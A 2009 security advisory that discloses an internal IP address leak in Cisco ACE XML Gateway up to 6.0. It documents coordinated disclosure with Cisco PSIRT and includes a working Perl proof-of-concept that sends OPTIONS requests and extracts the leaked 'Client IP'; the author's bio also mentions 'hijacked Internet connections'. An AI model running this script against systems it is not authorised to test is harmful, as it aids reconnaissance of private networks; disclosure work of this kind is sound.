Vulnerability Information
=======================================
Product: Cisco ACE XML Gateway <= 6.0
Vulnerabily: Internal IP Address Disclosure
Vendor: Cisco Systems, Inc. http://www.cisco.com
Product URL: http://www.cisco.com/en/US/products/ps7314/
Author: nitrØus [ Alejandro Hernandez H. ]
Discovery Date: 24/Aug/2009
Attack Vector: Remote
CVSS v2 Base Score: 5 (Medium) [ AV:N/AC:L/Au:N/C:P/I:N/A:N ]
Class: I think, it's a Design problem on the error messages' handling
Product Information
=======================================
The Cisco ACE XML Gateway is a key component of the Cisco Application Control
Engine (ACE) family of products. It brings application intelligence into the
network and enables efficient deployment of secure, reliable, and accelerated
Web service environments based on XML (Extensible Markup Language) and SOAP
(Simple Object Access Protocol) using a shared network infrastructure.
The ACE XML Gateway helps you to secure, manage, monitor, and accelerate an SOA.
In a service-oriented environment, the ACE XML Gateway acts as a service
virtualization layer. It decouples service providers from consumers, increasing
the stability, maintainability, and flexibility of those services. It enforces
security policies and applies business rules, such as routing decisions and
content validation processing, across message traffic in the environment.
The ACE XML Gateway secures your SOA implementation by providing advanced XML
firewall capabilities, with built-in protection against XML-based attacks,
such as SQL injection or entity expansion attacks, content screening capabilities
and more.
With a high-performance, streaming XML processing engine, the ACE XML Gateway
reduces the performance impact of XML traffic on the network.
Vulnerability Explaination
=======================================
Let's wait for the Cisco response, so, we'll have a better understanding on this
issue. Meanwhile...
I think this is a design error because ACE XML doesn't have in mind that the
client could probably be in the same network segment internally, so, it receives
the request, which cannot be processed, and throws an error message disclosing
an internal IP address.
According to the ACE XML Gateway User Guide, Log Messages chapter, the listed
error messages belong to different categories such as Alerts, Startup, Operational
and Policy Errors, so, I'm assuming that the OPTIONS HTTP method doesn't fit in
none of the mentioned categories, resulting in a message explaining that there's
no handler for this type of request which discloses an internal IP address.
Cisco PSIRT (Product Security Incident Response Team) responded by saying that the
bug is triggered not only by the OPTIONS request. Internal IP address is included
in response if ACE XML Gateway was not able to find a matching handler for the
request. Also, the PSIRT verified that GET request, with a path for which no
handler was configured, results in the same address disclosure.
Again, I think it's a design error because it wasn't taken into account that the
error message would disclose an internal IP address from the internal network.
Disclosure Timeline
=======================================
DD/MM/YYYY
24/08/2009 The vulnerability was discovered.
25/08/2009 Exploit/PoC code was developed (private).
01/09/2009 Cisco PSIRT (Product Security Incident Response Team) was
notificated about the issue.
02/09/2009 Vendor response asking for details of the testing environment.
02/09/2009 Test scenario explained and screenshots of the exploitation
attached.
03/09/2009 PSIRT Incident Management assing an internal tracking ID number for
the vulnerability.
08/09/2009 The PSIRT Incident Manager took the ownership of the vulnerability.
11/09/2009 Developers confirmed the vulnerability. Code fixes and testing
remained pending.
Green flag given to go public whenever I'd like.
17/09/2009 Fix will available in the next ACE XML Gateway release (6.1).
PSIRT Incident Manager explained me the PSIRT response process
followed in case of publishing the vulnerability in BugTraq,
full-disclosure, milw0rm, packetstorm, etc.
24/09/2009 Tonight!, the vulnerability goes public and PSIRT is informed.
Exploit/PoC Code
=======================================
#!/usr/bin/perl -w
#
# Cisco ACE XML Gateway <= 6.0
# Internal IP Address Disclosure
#
# -=- PRIV8 -=- 0day -=- PRIV8 -=- 0day -=- PRIV8 -=-
#
# -[nitrØus]- [ Alejandro Hernandez H. ]
# nitrousenador -at- gmail -dot- com
# http://www.brainoverflow.org
#
# MexicØ / 25-Aug-2ØØ9
#
# -=- PUBLIC NOW -=-
# Published on September 24th, 2009
#
# ADVISORY: http://www.brainoverflow.org/advisories/cisco_ace_xml_gw_ip_disclosure.t
xt
#
use strict;
use Socket qw/ :DEFAULT :crlf /; # $CRLF
use IO::Socket;
sub header
{
print " .+==================================+.\n";
print " / Cisco ACE XML Gateway <= 6.0 \\\n";
print "| Internal IP Address Disclosure |\n";
print "| |\n";
print " \\ -nitr0us- /\n";
print " `+==================================+`\n\n";
}
sub usage
{
header;
print "Usage: $0 <host> [port(default 80)]\n";
exit 0xdead;
}
my $host = shift || usage;
my $port = shift || 80;
my $axg;
my $axg_response;
my @payloads = ("OPTIONS / HTTP/1.0" . $CRLF . $CRLF,
"OPTIONS / HTTP/1.1" . $CRLF . "Host: " . $host . $CRLF . $CRLF);
header;
print "[+] Connecting to $host on port $port ...\n";
for(@payloads){
$axg = IO::Socket::INET->new( PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp')
or die "[-] Could not create socket: $!\n";
print "[+] Sending payload ...\n";
print $axg $_;
$axg->read($axg_response, 1024);
print "[+] Parsing response ...\n";
if($axg_response =~ /Client IP: (.*)/){
print "[+] Internal IP disclosure: $1\n";
$axg->close();
exit 0xbabe;
}
$axg->close();
}
print "[-] Not vulnerable !\n";
Solution
=======================================
Wait for Cisco ACE XML Gateway 6.1 or Cisco's workaround/patch for previous
versions.
Shouts
=======================================
Cisco PSIRT (Product Security Incident Response Team) guys, chr1x, ril0, crypkey,
alt3kx, hkm, CRAc, #mendozaaaa, nediam, nahual, tr3w, darko, dex, Daemon, beck,
ran, Hctor L., Zeus, www.underground.org.mx, Bucio, etc... etc... etc...
Author Information
=======================================
Author: nitrØus [ Alejandro Hernandez H. ]
E-mail: nitrousenador -at- gmail -dot- com
Website: http://www.brainoverflow.org
Country: Mexico
About CubilFelino Security Research Lab
=======================================
It's very peaceful (underground), but dark place in Mxico which has a lot of
desktop and laptop computers, (hardc0re) network hardware, wire/unwired stuff,
some hijacked Internet connections, music gear and studio (midi controllers and
synthesizers), Psytrance/Drum & Bass music almost always resounding the walls,
and why not? a very very nice aquarium with river monsters: piranhas, oscar
fish & a plecostomus. Also, it's equipped with a little fridge full of munchies,
alcohol and caffeine; with a box of cigarretes on the desktop and a lot of books
that can't imagine about (in) security, martial-arts (yeah! we love Ninjutsu
hacking) & programming, is the best place to do R+D for the wonderful, exciting
& fascinating world of computers and security. Here, Hacking is sublime !